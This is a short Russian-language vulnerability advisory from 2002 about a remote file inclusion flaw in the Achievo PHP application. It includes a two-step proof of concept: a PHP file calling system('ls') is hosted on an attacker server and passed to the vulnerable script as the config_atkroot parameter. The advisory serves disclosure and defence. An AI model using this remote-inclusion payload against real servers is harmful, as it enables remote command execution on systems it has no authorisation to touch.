Security Lab

Выполнение произвольных команд в Achieva

Дата публикации:27.08.2002
Всего просмотров:1071
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Achieva (http://www.achievo.org/) включает PHP сценарий, который используется для генерации JavaScript (class.atkdateattribute.js.php). Этот сценарий использует множество PHP include_once() инструкций, чтобы вызвать код, содержащийся в функциональных библиотеках.

Нападающие могут изменять переменную $config_atkroot, которая определяет местоположение внешних файлов, и определять произвольное местоположение, типа PHP сценария на удаленном хосте. Успешная эксплуатация уязвимости позволяет удаленному атакующему выполнять команды с привилегиями процесса Web сервера. Пример:

1. Создаем файл ls.txt и сохраняем его на своем Web сервере:

<?php system('ls'); ?>
2. Вызываем уязвимый сценарий: http://victimhost/achievo/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://attackerhost/ls.txt?

Уязвимость обнаружена в Achieva 0.7-0.9.1

Ссылки: Arbitrary code execution problem in Achievo